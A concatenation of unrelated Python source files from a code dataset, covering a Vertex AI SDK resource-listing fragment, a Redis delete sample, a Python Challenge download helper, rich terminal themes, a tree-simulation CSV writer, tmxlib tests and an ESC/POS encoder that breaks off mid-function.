        # Attributes copied only when present (e.g. subclasses with a
        # prediction client).
        optional_sync_attributes = ["_prediction_client"]

        for attribute in sync_attributes:
            setattr(self, attribute, getattr(result, attribute))

        for attribute in optional_sync_attributes:
            value = getattr(result, attribute, None)
            if value:
                setattr(self, attribute, value)
    @classmethod
    def _construct_sdk_resource_from_gapic(
        cls,
        gapic_resource: proto.Message,
        project: Optional[str] = None,
        location: Optional[str] = None,
        credentials: Optional[auth_credentials.Credentials] = None,
    ) -> VertexAiResourceNoun:
        """Given a GAPIC resource object, return the SDK representation.

        Args:
            gapic_resource (proto.Message):
                A GAPIC representation of a Vertex AI resource, usually
                retrieved by a get_* or in a list_* API call.
            project (str):
                Optional. Project to construct SDK object from. If not set,
                project set in aiplatform.init will be used.
            location (str):
                Optional. Location to construct SDK object from. If not set,
                location set in aiplatform.init will be used.
            credentials (auth_credentials.Credentials):
                Optional. Custom credentials to use to construct SDK object.
                Overrides credentials set in aiplatform.init.

        Returns:
            VertexAiResourceNoun:
                An initialized SDK object that represents GAPIC type.
        """
        # Build an empty shell (no service call) and attach the proto directly.
        sdk_resource = cls._empty_constructor(
            project=project, location=location, credentials=credentials
        )
        sdk_resource._gca_resource = gapic_resource
        return sdk_resource
# TODO(b/144545165): Improve documentation for list filtering once available
# TODO(b/184910159): Expose `page_size` field in list method
@classmethod
def _list(
    cls,
    cls_filter: Callable[[proto.Message], bool] = lambda _: True,
    filter: Optional[str] = None,
    order_by: Optional[str] = None,
    project: Optional[str] = None,
    location: Optional[str] = None,
    credentials: Optional[auth_credentials.Credentials] = None,
    parent: Optional[str] = None,
) -> List[VertexAiResourceNoun]:
    """Private method to list all instances of this Vertex AI Resource,
    filtered client-side through `cls_filter`.

    Args:
        cls_filter (Callable[[proto.Message], bool]):
            A function that takes one argument, a GAPIC resource, and
            returns a bool. Resources for which it returns False are
            excluded from the result. Example usage:
            cls_filter = lambda obj: obj.metadata in cls.valid_metadatas
        filter (str):
            Optional. An expression for filtering the results of the
            request. For field names both snake_case and camelCase are
            supported.
        order_by (str):
            Optional. A comma-separated list of fields to order by, sorted
            in ascending order. Use "desc" after a field name for
            descending. Supported fields: `display_name`, `create_time`,
            `update_time`.
        project (str):
            Optional. Project to retrieve list from. If not set, project
            set in aiplatform.init will be used.
        location (str):
            Optional. Location to retrieve list from. If not set, location
            set in aiplatform.init will be used.
        credentials (auth_credentials.Credentials):
            Optional. Custom credentials to use to retrieve list.
            Overrides credentials set in aiplatform.init.
        parent (str):
            Optional. The parent resource name if any to retrieve the
            resource list from.

    Returns:
        List[VertexAiResourceNoun] - A list of SDK resource objects
    """
    # An "empty" instance gives us a configured API client without a
    # backing resource.
    lister = cls._empty_constructor(
        project=project, location=location, credentials=credentials
    )
    # Fetch credentials once and re-use for all `_empty_constructor()` calls
    creds = lister.credentials

    request = {
        "parent": parent
        or initializer.global_config.common_location_path(
            project=project, location=location
        ),
        "filter": filter,
    }
    if order_by:
        request["order_by"] = order_by

    fetched = getattr(lister.api_client, lister._list_method)(request=request) or []

    return [
        cls._construct_sdk_resource_from_gapic(
            gapic_resource, project=project, location=location, credentials=creds
        )
        for gapic_resource in fetched
        if cls_filter(gapic_resource)
    ]
@classmethod
def _list_with_local_order(
    cls,
    cls_filter: Callable[[proto.Message], bool] = lambda _: True,
    filter: Optional[str] = None,
    order_by: Optional[str] = None,
    project: Optional[str] = None,
    location: Optional[str] = None,
    credentials: Optional[auth_credentials.Credentials] = None,
) -> List[VertexAiResourceNoun]:
    """Private method to list all instances of this Vertex AI Resource,
    takes a `cls_filter` arg to filter to a particular SDK resource
    subclass. Provides client-side sorting when a list API doesn't support
    `order_by`.

    Args:
        cls_filter (Callable[[proto.Message], bool]):
            A function that takes one argument, a GAPIC resource, and
            returns a bool. Resources for which it returns False are
            excluded from the result.
        filter (str):
            Optional. An expression for filtering the results of the
            request. For field names both snake_case and camelCase are
            supported.
        order_by (str):
            Optional. A comma-separated list of fields to order by, sorted
            in ascending order. Use "desc" after a field name for
            descending. Supported fields: `display_name`, `create_time`,
            `update_time`.
        project (str):
            Optional. Project to retrieve list from. If not set, project
            set in aiplatform.init will be used.
        location (str):
            Optional. Location to retrieve list from. If not set, location
            set in aiplatform.init will be used.
        credentials (auth_credentials.Credentials):
            Optional. Custom credentials to use to retrieve list.
            Overrides credentials set in aiplatform.init.

    Returns:
        List[VertexAiResourceNoun] - A list of SDK resource objects
    """
    li = cls._list(
        cls_filter=cls_filter,
        filter=filter,
        order_by=None,  # This method will handle the ordering locally
        project=project,
        location=location,
        credentials=credentials,
    )

    if order_by:
        # Parse clauses of the form "field" or "field desc". The previous
        # implementation removed every "desc" substring from the whole
        # order_by string, which corrupted field names merely containing
        # those letters; "desc" is now only honored as a trailing token.
        # As before, a single reverse flag applies to the entire sort
        # (per-field direction is not supported locally).
        descending = False
        sort_fields = []
        for clause in order_by.split(","):
            tokens = clause.split()
            if tokens and tokens[-1].lower() == "desc":
                descending = True
                tokens = tokens[:-1]
            if tokens:
                sort_fields.append(tokens[0])
        li.sort(
            key=lambda x: tuple(getattr(x, field) for field in sort_fields),
            reverse=descending,
        )

    return li
@classmethod
def list(
    cls,
    filter: Optional[str] = None,
    order_by: Optional[str] = None,
    project: Optional[str] = None,
    location: Optional[str] = None,
    credentials: Optional[auth_credentials.Credentials] = None,
    parent: Optional[str] = None,
) -> List[VertexAiResourceNoun]:
    """List all instances of this Vertex AI Resource.

    Example Usage:

        aiplatform.BatchPredictionJobs.list(
            filter='state="JOB_STATE_SUCCEEDED" AND display_name="my_job"',
        )

        aiplatform.Model.list(order_by="create_time desc, display_name")

    Args:
        filter (str):
            Optional. An expression for filtering the results of the
            request. For field names both snake_case and camelCase are
            supported.
        order_by (str):
            Optional. A comma-separated list of fields to order by, sorted
            in ascending order. Use "desc" after a field name for
            descending. Supported fields: `display_name`, `create_time`,
            `update_time`.
        project (str):
            Optional. Project to retrieve list from. If not set, project
            set in aiplatform.init will be used.
        location (str):
            Optional. Location to retrieve list from. If not set, location
            set in aiplatform.init will be used.
        credentials (auth_credentials.Credentials):
            Optional. Custom credentials to use to retrieve list.
            Overrides credentials set in aiplatform.init.
        parent (str):
            Optional. The parent resource name if any to retrieve list
            from.

    Returns:
        List[VertexAiResourceNoun] - A list of SDK resource objects
    """
    # Public entry point: defer entirely to _list with the default
    # (accept-everything) class filter.
    return cls._list(
        filter=filter,
        order_by=order_by,
        project=project,
        location=location,
        credentials=credentials,
        parent=parent,
    )
@optional_sync()
def delete(self, sync: bool = True) -> None:
    """Deletes this Vertex AI resource. WARNING: This deletion is
    permanent.

    Args:
        sync (bool):
            Whether to execute this deletion synchronously. If False, this
            method will be executed in concurrent Future and any downstream
            object will be immediately returned and synced when the Future
            has completed.
    """
    _LOGGER.log_action_start_against_resource("Deleting", "", self)
    delete_lro = getattr(self.api_client, self._delete_method)(
        name=self.resource_name
    )
    _LOGGER.log_action_started_against_resource_with_lro(
        "Delete", "", self.__class__, delete_lro
    )
    # Block until the long-running delete operation finishes.
    delete_lro.result()
    _LOGGER.log_action_completed_against_resource("deleted.", "", self)
def __repr__(self) -> str:
    """Use the resource repr when the resource exists, else the future repr."""
    resource_ready = bool(self._gca_resource) and self._resource_is_available
    base = VertexAiResourceNoun if resource_ready else FutureManager
    return base.__repr__(self)
def _wait_for_resource_creation(self) -> None:
    """Wait until underlying resource is created.

    Currently this should only be used on subclasses that implement the
    construct then `run` pattern because the underlying sync=False
    implementation will not update downstream resource noun object's
    _gca_resource until the entire invoked method is complete.

    Ex:
        job = CustomTrainingJob()
        job.run(sync=False, ...)
        job._wait_for_resource_creation()

    Raises:
        RuntimeError: If the resource has not been scheduled to be created.
    """

    def resource_created() -> bool:
        return bool(getattr(self._gca_resource, "name", None))

    # If the user calls this but didn't actually invoke an API to create
    if self._are_futures_done() and not resource_created():
        self._raise_future_exception()
        raise RuntimeError(
            f"{self.__class__.__name__} resource is not scheduled to be created."
        )

    # Poll until the resource name appears; a finished future without a
    # name means async creation failed, so surface that exception.
    while not resource_created():
        if self._are_futures_done() and not resource_created():
            self._raise_future_exception()
        time.sleep(1)
def _assert_gca_resource_is_available(self) -> None:
    """Helper method to raise when accessing properties that do not exist.

    Overrides VertexAiResourceNoun to provide a more informative exception
    if resource creation has failed asynchronously.

    Raises:
        RuntimeError: When resource has not been created.
    """
    if getattr(self._gca_resource, "name", None):
        return
    # Include the async failure cause, if any, to aid debugging.
    failure_detail = (
        f" Resource failed with: {self._exception}" if self._exception else ""
    )
    raise RuntimeError(
        f"{self.__class__.__name__} resource has not been created." + failure_detail
    )
def get_annotation_class(annotation: type) -> type:
    """Return the underlying type of a type hint.

    For ``Optional[X]`` (i.e. ``Union[X, None]``) hints, this is the first
    union member; any other annotation is returned unchanged.

    Args:
        annotation (type): Type hint
    """
    origin = getattr(annotation, "__origin__", None)
    return annotation.__args__[0] if origin is Union else annotation
class DoneMixin(abc.ABC):
    """Abstract mixin declaring a ``done`` method, indicating whether a
    job has completed."""

    @abc.abstractmethod
    def done(self) -> bool:
        """Return whether the job has completed."""
class StatefulResource(DoneMixin):
    """Extends DoneMixin to check whether a job returning a stateful
    resource has completed."""

    @property
    @abc.abstractmethod
    def state(self):
        """The current state of the job."""

    # NOTE(review): stacking @property on @classmethod behaves as a true
    # "class property" only on Python 3.9-3.10; subclasses are presumably
    # expected to shadow this with a plain class attribute — confirm.
    @property
    @classmethod
    @abc.abstractmethod
    def _valid_done_states(cls):
        """A set() containing all job states associated with a completed job."""

    def done(self) -> bool:
        """Return True if the job's state is one of the terminal states."""
        return self.state in self._valid_done_states
class VertexAiStatefulResource(VertexAiResourceNounWithFutureManager, StatefulResource):
    """Extends StatefulResource to include a check for self._gca_resource."""

    def done(self) -> bool:
        """Return True if the job has completed.

        Completion is only consulted once the backing resource exists,
        i.e. ``self._gca_resource`` has a populated ``name``.
        """
        resource_exists = bool(self._gca_resource) and bool(self._gca_resource.name)
        return super().done() if resource_exists else False
| 36.435897 | 119 | 0.620946 |
ace8e8bcb8dee4ce0aaedf2d3b0bac705ea45f57 | 1,497 | py | Python | tests/integration/goldens/redis/samples/generated_samples/redis_generated_redis_v1_cloud_redis_delete_instance_sync.py | LaudateCorpus1/gapic-generator-python | 4f4ad394374326a74ceefd2c37c54e228d74ba8d | [
"Apache-2.0"
] | null | null | null | tests/integration/goldens/redis/samples/generated_samples/redis_generated_redis_v1_cloud_redis_delete_instance_sync.py | LaudateCorpus1/gapic-generator-python | 4f4ad394374326a74ceefd2c37c54e228d74ba8d | [
"Apache-2.0"
] | null | null | null | tests/integration/goldens/redis/samples/generated_samples/redis_generated_redis_v1_cloud_redis_delete_instance_sync.py | LaudateCorpus1/gapic-generator-python | 4f4ad394374326a74ceefd2c37c54e228d74ba8d | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteInstance
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-redis
# [START redis_generated_redis_v1_CloudRedis_DeleteInstance_sync]
from google.cloud import redis_v1
def sample_delete_instance():
    """Delete a Cloud Memorystore for Redis instance and wait for the LRO."""
    # Create a client
    client = redis_v1.CloudRedisClient()

    # Initialize request argument(s)
    request = redis_v1.DeleteInstanceRequest(
        name="name_value",
    )

    # Make the request
    operation = client.delete_instance(request=request)

    print("Waiting for operation to complete...")

    response = operation.result()
    print(response)
# [END redis_generated_redis_v1_CloudRedis_DeleteInstance_sync]
| 31.1875 | 85 | 0.754175 |
ace8e8e0678408016867b9b19a5f87836e007d8c | 1,197 | py | Python | get_challenge.py | z-Wind/Python_Challenge | be91ed491be57a1b9bf4b6d6bcb8ca23f48ef81b | [
"MIT"
] | null | null | null | get_challenge.py | z-Wind/Python_Challenge | be91ed491be57a1b9bf4b6d6bcb8ca23f48ef81b | [
"MIT"
] | null | null | null | get_challenge.py | z-Wind/Python_Challenge | be91ed491be57a1b9bf4b6d6bcb8ca23f48ef81b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""docstring with a description"""
__author__ = "ๅญ้ขจ"
__copyright__ = "Copyright 2015, Sun All rights reserved"
__version__ = "1.0.0"
import urllib.request
from io import BytesIO
def opener(username, password):
    """Build a urllib opener with HTTP basic auth for pythonchallenge.com.

    Args:
        username: basic-auth user name.
        password: basic-auth password.

    Returns:
        urllib.request.OpenerDirector with auth and system-proxy handlers.
    """
    # User Name & Password
    password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
    top_level_url = 'http://www.pythonchallenge.com/'
    password_mgr.add_password(None, top_level_url, username, password)
    handler = urllib.request.HTTPBasicAuthHandler(password_mgr)

    # Proxy setting. The original mapped the system HTTP proxy under the
    # bogus scheme key 'sock5', which ProxyHandler never consults for
    # http:// URLs, so the proxy was silently ignored. Pass the system
    # proxy mapping through under its real scheme keys instead.
    proxy_support = urllib.request.ProxyHandler(urllib.request.getproxies())

    # opener setting
    return urllib.request.build_opener(proxy_support, handler)
def download(url, username, password):
    """Fetch *url* with basic auth and browser-like headers.

    Args:
        url: the page to download.
        username: basic-auth user name.
        password: basic-auth password.

    Returns:
        io.BytesIO holding the response body.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0",
        "Accept-Language": "zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    }
    req = urllib.request.Request(url, headers=headers)
    bros = opener(username, password)
    # try/finally ensures the opener is closed even if the request fails
    # (the original leaked it on any network error).
    try:
        data = BytesIO(bros.open(req).read())
    finally:
        bros.close()
    return data
| 29.925 | 91 | 0.670844 |
ace8e93def8c58b67790d0c4e8fee9f582f1dac4 | 3,371 | py | Python | Lib/site-packages/pip/_vendor/rich/terminal_theme.py | edupyter/EDUPYTER38 | 396183cea72987506f1ef647c0272a2577c56218 | [
"bzip2-1.0.6"
] | 1 | 2022-02-25T13:46:54.000Z | 2022-02-25T13:46:54.000Z | Lib/site-packages/pip/_vendor/rich/terminal_theme.py | edupyter/EDUPYTER38 | 396183cea72987506f1ef647c0272a2577c56218 | [
"bzip2-1.0.6"
] | 1 | 2022-01-27T19:09:25.000Z | 2022-01-27T19:09:25.000Z | Lib/site-packages/pip/_vendor/rich/terminal_theme.py | edupyter/EDUPYTER38 | 396183cea72987506f1ef647c0272a2577c56218 | [
"bzip2-1.0.6"
] | 1 | 2021-09-27T11:14:58.000Z | 2021-09-27T11:14:58.000Z | from typing import List, Optional, Tuple
from .color_triplet import ColorTriplet
from .palette import Palette
_ColorTuple = Tuple[int, int, int]
class TerminalTheme:
    """A color theme used when exporting console content.

    Args:
        background (Tuple[int, int, int]): The background color.
        foreground (Tuple[int, int, int]): The foreground (text) color.
        normal (List[Tuple[int, int, int]]): A list of 8 normal intensity colors.
        bright (List[Tuple[int, int, int]], optional): A list of 8 bright colors, or None
            to repeat normal intensity. Defaults to None.
    """

    def __init__(
        self,
        background: _ColorTuple,
        foreground: _ColorTuple,
        normal: List[_ColorTuple],
        bright: Optional[List[_ColorTuple]] = None,
    ) -> None:
        self.background_color = ColorTriplet(*background)
        self.foreground_color = ColorTriplet(*foreground)
        # When no bright palette is supplied, the normal colors are reused
        # so the ANSI palette always holds both halves.
        ansi_colors = normal + (bright or normal)
        self.ansi_colors = Palette(ansi_colors)
# Plain theme: black text on a white background with the standard
# 8 normal + 8 bright ANSI colors.
DEFAULT_TERMINAL_THEME = TerminalTheme(
    (255, 255, 255),
    (0, 0, 0),
    [
        (0, 0, 0),
        (128, 0, 0),
        (0, 128, 0),
        (128, 128, 0),
        (0, 0, 128),
        (128, 0, 128),
        (0, 128, 128),
        (192, 192, 192),
    ],
    [
        (128, 128, 128),
        (255, 0, 0),
        (0, 255, 0),
        (255, 255, 0),
        (0, 0, 255),
        (255, 0, 255),
        (0, 255, 255),
        (255, 255, 255),
    ],
)

# Dark theme used for SVG export: light text on a near-black background.
SVG_EXPORT_THEME = TerminalTheme(
    (12, 12, 12),
    (242, 242, 242),
    [
        (12, 12, 12),
        (205, 49, 49),
        (13, 188, 121),
        (229, 229, 16),
        (36, 114, 200),
        (188, 63, 188),
        (17, 168, 205),
        (229, 229, 229),
    ],
    [
        (102, 102, 102),
        (241, 76, 76),
        (35, 209, 139),
        (245, 245, 67),
        (59, 142, 234),
        (214, 112, 214),
        (41, 184, 219),
        (229, 229, 229),
    ],
)

# NOTE(review): the three themes below pass 9 normal and 7 bright colors
# (16 total fed to Palette) instead of 8+8 — presumably intentional;
# confirm against the upstream palette definitions.
MONOKAI = TerminalTheme(
    (12, 12, 12),
    (217, 217, 217),
    [
        (26, 26, 26),
        (244, 0, 95),
        (152, 224, 36),
        (253, 151, 31),
        (157, 101, 255),
        (244, 0, 95),
        (88, 209, 235),
        (196, 197, 181),
        (98, 94, 76),
    ],
    [
        (244, 0, 95),
        (152, 224, 36),
        (224, 213, 97),
        (157, 101, 255),
        (244, 0, 95),
        (88, 209, 235),
        (246, 246, 239),
    ],
)

# Lower-contrast variant of the Monokai palette.
DIMMED_MONOKAI = TerminalTheme(
    (25, 25, 25),
    (185, 188, 186),
    [
        (58, 61, 67),
        (190, 63, 72),
        (135, 154, 59),
        (197, 166, 53),
        (79, 118, 161),
        (133, 92, 141),
        (87, 143, 164),
        (185, 188, 186),
        (136, 137, 135),
    ],
    [
        (251, 0, 31),
        (15, 114, 47),
        (196, 112, 51),
        (24, 109, 227),
        (251, 0, 103),
        (46, 112, 109),
        (253, 255, 185),
    ],
)

# Light theme: dark text on a white background.
NIGHT_OWLISH = TerminalTheme(
    (255, 255, 255),
    (64, 63, 83),
    [
        (1, 22, 39),
        (211, 66, 62),
        (42, 162, 152),
        (218, 170, 1),
        (72, 118, 214),
        (64, 63, 83),
        (8, 145, 106),
        (122, 129, 129),
        (122, 129, 129),
    ],
    [
        (247, 110, 110),
        (73, 208, 197),
        (218, 194, 107),
        (92, 167, 228),
        (105, 112, 152),
        (0, 201, 144),
        (152, 159, 177),
    ],
)
ace8e9f238c65ad15827000043996c3d1790339a | 5,835 | py | Python | TreeOutputLib/OneTimestepOneFile/OneTimestepOneFile.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | TreeOutputLib/OneTimestepOneFile/OneTimestepOneFile.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | TreeOutputLib/OneTimestepOneFile/OneTimestepOneFile.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@date: 2018-Today
@author: jasper.bathmann@ufz.de
"""
from TreeOutputLib.TreeOutput import TreeOutput
import os
## Output class. This class creates one file per timestep at a defined
# location. A line containing time, position, desired geometric measures and
# desired parameters is written at every nth timestep.
class OneTimestepOneFile(TreeOutput):
    ## Constructor of dummy objects in order to drop output
    #  @param args xml element parsed from project to this constructor.
    def __init__(self, args):
        ## Directory, where output is saved. Please make sure it exists and is
        #  empty.
        self.output_dir = self.checkRequiredKey("output_dir", args)
        ## N-timesteps between two outputs
        self.output_each_nth_timestep = int(
            self.checkRequiredKey("output_each_nth_timestep", args))
        ## Geometric measures included in output
        self.geometry_outputs = []
        ## Parameters included in output
        self.parameter_outputs = []
        ## Growth measures included in output
        self.growth_outputs = []
        ## Counter for output generation
        self._output_counter = 0
        for key in args.iterchildren("geometry_output"):
            self.geometry_outputs.append(key.text.strip())
        for key in args.iterchildren("parameter_output"):
            self.parameter_outputs.append(key.text.strip())
        for key in args.iterchildren("growth_output"):
            self.growth_outputs.append(key.text.strip())
        try:
            dir_files = len(os.listdir(self.output_dir))
        except FileNotFoundError:
            raise FileNotFoundError(
                "[Errno 2] No such directory: '" + self.output_dir +
                "' as defined in the project file." +
                " Please make sure your output directory exists!")
        if dir_files > 0:
            raise ValueError("Output directory '" + self.output_dir +
                             "' is not empty.")
        print(
            "Output to '" + self.output_dir + "' of tree positions, the " +
            "parameters ", self.parameter_outputs,
            " and geometric" + " measures ", self.geometry_outputs,
            " at every " + str(self.output_each_nth_timestep) +
            " timesteps initialized.")

    ## Writes output to predefined folder
    #  For each timestep a file is created throughout the simulation.
    #  This function is only able to work, if the output directory exists and
    #  is empty at the begin of the model run
    def writeOutput(self, tree_groups, time):
        self._output_counter = (self._output_counter %
                                self.output_each_nth_timestep)
        filename = ("Population_t_%012.1f" % (time) + ".csv")
        # "with" guarantees the file handle is closed even if a KeyError
        # is raised while formatting a tree row (the original opened the
        # file via a bare open() and leaked the handle on any exception;
        # the local name also shadowed the builtin "file" in Python 2).
        with open(self.output_dir + filename, "w") as out_file:
            out_file.write(self._header_line())
            if self._output_counter == 0:
                for group_name, tree_group in tree_groups.items():
                    for tree in tree_group.getTrees():
                        out_file.write(
                            self._tree_line(group_name, tree, time))
        self._output_counter += 1

    ## Builds the csv header line matching the configured output columns.
    def _header_line(self):
        header = "tree,\t time,\t x,\t y"
        for column in (self.geometry_outputs + self.parameter_outputs +
                       self.growth_outputs):
            header += ",\t" + column
        return header + "\n"

    ## Formats one csv line for a single tree.
    #  @param group_name name of the tree group the tree belongs to
    #  @param tree the tree object to serialize
    #  @param time current simulation time
    def _tree_line(self, group_name, tree, time):
        growth_information = tree.getGrowthConceptInformation()
        line = (group_name + "_" + "%09.0d" % (tree.getId()) + ",\t" +
                str(time) + ",\t" + str(tree.x) + ",\t" + str(tree.y))
        if len(self.geometry_outputs) > 0:
            geometry = tree.getGeometry()
            for geometry_output in self.geometry_outputs:
                line += ",\t" + str(geometry[geometry_output])
        if len(self.parameter_outputs) > 0:
            parameter = tree.getParameter()
            for parameter_output in self.parameter_outputs:
                line += ",\t" + str(parameter[parameter_output])
        if len(growth_information) > 0:
            for growth_output_key in self.growth_outputs:
                try:
                    line += ",\t" + str(
                        growth_information[growth_output_key])
                except KeyError:
                    raise KeyError(
                        "Key " + growth_output_key +
                        " not available in growth concept!" +
                        " Please read growth concept documentation.")
        return line + "\n"

    ## This function checks if a key exists and if its text content is empty.
    #  Raises key-errors, if the key is not properly defined.
    #  @param key Name of the key to be checked
    #  @param args args parsed from project. Xml-element
    def checkRequiredKey(self, key, args):
        tmp = args.find(key)
        if tmp is None:
            raise KeyError("Required key '" + key + "' in project file at " +
                           "position MangaProject__tree_output is missing.")
        elif tmp.text.strip() == "":
            raise KeyError("Key '" + key + "' in project file at position " +
                           "MangaProject__tree_output needs to be specified.")
        return tmp.text

    ## This function returns the output directory
    def getOutputDir(self):
        return self.output_dir
| 47.439024 | 80 | 0.559554 |
ace8ea12a6607225be3bee0af7d953338a0dfe13 | 1,662 | py | Python | tmxlib_test/test_helpers.py | logicplace/pytmxlib | fe615974e0ea74a6201a392381cbffdfb925bcc2 | [
"MIT"
] | null | null | null | tmxlib_test/test_helpers.py | logicplace/pytmxlib | fe615974e0ea74a6201a392381cbffdfb925bcc2 | [
"MIT"
] | null | null | null | tmxlib_test/test_helpers.py | logicplace/pytmxlib | fe615974e0ea74a6201a392381cbffdfb925bcc2 | [
"MIT"
] | 1 | 2020-07-08T07:51:43.000Z | 2020-07-08T07:51:43.000Z |
from __future__ import division
import pytest
from tmxlib import helpers
def test_from_dict_method():
    class Holder(object):
        @helpers.from_dict_method
        def from_dict_pop(self, dct, expected):
            assert dct.pop('key') == expected
            return dct.pop('rv')

        @helpers.from_dict_method
        def from_dict_nopop(self, dct, expected):
            assert dct['key'] == expected

    holder = Holder()
    # A method that consumes every key returns its value normally.
    assert holder.from_dict_pop({'key': 1, 'rv': 2}, 1) == 2
    # Leftover keys cause the wrapper to raise ValueError.
    with pytest.raises(ValueError):
        holder.from_dict_nopop({'key': 1, 'rv': 2}, 1)
class NamedItem(str):
    """A string whose ``name`` attribute is its lowercased value."""

    @property
    def name(self):
        return self.lower()
def test_named_elem_list():
    lst = helpers.NamedElementList(NamedItem(ch) for ch in 'Abcda')
    assert list(lst) == ['A', 'b', 'c', 'd', 'a']
    # Positional access, including negative indices.
    for index, expected in [(0, 'A'), (1, 'b'), (-1, 'a')]:
        assert lst[index] == expected
    # Name-based access ('a' finds 'A' because name is lowercased).
    for key, expected in [('a', 'A'), ('b', 'b'), ('c', 'c')]:
        assert lst[key] == expected
    # Out-of-range indices and unknown names raise.
    for bad_index in (100, -100):
        with pytest.raises(IndexError):
            lst[bad_index]
    with pytest.raises(KeyError):
        lst['z']
def test_empty_named_elem_list():
    empty = helpers.NamedElementList()
    assert list(empty) == []
    # Indexing and name lookup both fail on an empty list.
    with pytest.raises(IndexError):
        empty[0]
    with pytest.raises(KeyError):
        empty['k']
def test_assert_item():
    dct = {'key': 'value', 'key2': 'bad value'}
    # A matching item is consumed from the dict.
    helpers.assert_item(dct, 'key', 'value')
    assert list(dct.keys()) == ['key2']
    # A now-missing key raises KeyError; a wrong value raises ValueError.
    with pytest.raises(KeyError):
        helpers.assert_item(dct, 'key', 'value')
    with pytest.raises(ValueError):
        helpers.assert_item(dct, 'key2', 'good value')
ace8ea2b3d33af2b1dd3df34fdcbd333f4ec4bca | 10,809 | py | Python | src/escpos/magicencode.py | cohorte/python-escpos | 620cf97bbf411a4e0890f180adf62303a32852b5 | [
"MIT"
] | 683 | 2015-12-28T08:52:55.000Z | 2022-03-30T18:28:33.000Z | src/escpos/magicencode.py | cohorte/python-escpos | 620cf97bbf411a4e0890f180adf62303a32852b5 | [
"MIT"
] | 345 | 2015-12-23T20:56:12.000Z | 2022-03-06T19:48:28.000Z | src/escpos/magicencode.py | cohorte/python-escpos | 620cf97bbf411a4e0890f180adf62303a32852b5 | [
"MIT"
] | 243 | 2015-12-25T17:52:20.000Z | 2022-03-30T00:10:50.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
""" Magic Encode
This module tries to convert an UTF-8 string to an encoded string for the printer.
It uses trial and error in order to guess the right codepage.
The code is based on the encoding-code in py-xml-escpos by @fvdsn.
:author: `Patrick Kanzler <dev@pkanzler.de>`_
:organization: `python-escpos <https://github.com/python-escpos>`_
:copyright: Copyright (c) 2016 Patrick Kanzler and Frรฉdรฉric van der Essen
:license: MIT
"""
from builtins import bytes
from .constants import CODEPAGE_CHANGE
from .exceptions import Error
from .codepages import CodePages
import six
class Encoder(object):
    """Takes a map of available code pages and picks the right one for a
    given character.

    Note: To determine the code page, it needs to do the conversion, and
    thus already knows what the final byte in the target encoding would
    be. Nevertheless, the API of this class doesn't return the byte;
    the caller performs the character conversion itself.
    """

    def __init__(self, codepage_map):
        self.codepages = codepage_map
        self.available_encodings = set(codepage_map.keys())
        # encoding name -> {unicode char: codepoint}; filled lazily.
        self.available_characters = {}
        # Encodings already emitted to the printer in this session.
        self.used_encodings = set()

    def get_sequence(self, encoding):
        """Return the ESC/POS code-page slot number for *encoding*."""
        return int(self.codepages[encoding])

    def get_encoding_name(self, encoding):
        """Given an encoding provided by the user, will return a
        canonical encoding name; and also validate that the encoding
        is supported.

        TODO: Support encoding aliases: pc437 instead of cp437.
        """
        encoding = CodePages.get_encoding_name(encoding)
        if encoding not in self.codepages:
            raise ValueError((
                'Encoding "{}" cannot be used for the current profile. '
                'Valid encodings are: {}'
            ).format(encoding, ','.join(self.codepages.keys())))
        return encoding

    @staticmethod
    def _get_codepage_char_list(encoding):
        """Get characters 128-255 for a given code page, as a list.

        :param encoding: The name of the encoding. This must appear in the CodePage list
        """
        codepage = CodePages.get_encoding(encoding)
        if 'data' in codepage:
            encodable_chars = list("".join(codepage['data']))
            assert len(encodable_chars) == 128
            return encodable_chars
        elif 'python_encode' in codepage:
            encodable_chars = [u" "] * 128
            for i in range(0, 128):
                codepoint = i + 128
                try:
                    encodable_chars[i] = bytes([codepoint]).decode(
                        codepage['python_encode'])
                except UnicodeDecodeError:
                    # Hole in the code page; leave the placeholder space.
                    pass
            return encodable_chars
        raise LookupError("Can't find a known encoding for {}".format(encoding))

    def _get_codepage_char_map(self, encoding):
        """Return (and cache) a {unicode char: codepoint} map for *encoding*.

        :param encoding: The name of the encoding.
        """
        cached = self.available_characters.get(encoding)
        if cached is not None:
            return cached
        codepage_char_map = {
            char: index + 128
            for index, char in enumerate(self._get_codepage_char_list(encoding))
        }
        self.available_characters[encoding] = codepage_char_map
        return codepage_char_map

    def can_encode(self, encoding, char):
        """Determine if a character is encodeable in the given code page.

        :param encoding: The name of the encoding.
        :param char: The character to attempt to encode.
        """
        try:
            available_map = self._get_codepage_char_map(encoding)
        except LookupError:
            return False
        # ASCII is representable in every supported code page.
        return ord(char) < 128 or char in available_map

    @staticmethod
    def _encode_char(char, charmap, defaultchar):
        """Encode a single character with the given encoding map.

        :param char: char to encode
        :param charmap: dictionary for mapping characters in this code page
        :param defaultchar: fallback for characters missing from the map
        """
        codepoint = ord(char)
        if codepoint < 128:
            return codepoint
        return charmap.get(char, ord(defaultchar))

    def encode(self, text, encoding, defaultchar='?'):
        """Encode text under the given encoding.

        :param text: Text to encode
        :param encoding: Encoding name to use (must be defined in capabilities)
        :param defaultchar: Fallback for non-encodable characters
        """
        codepage_char_map = self._get_codepage_char_map(encoding)
        return bytes(
            [self._encode_char(char, codepage_char_map, defaultchar)
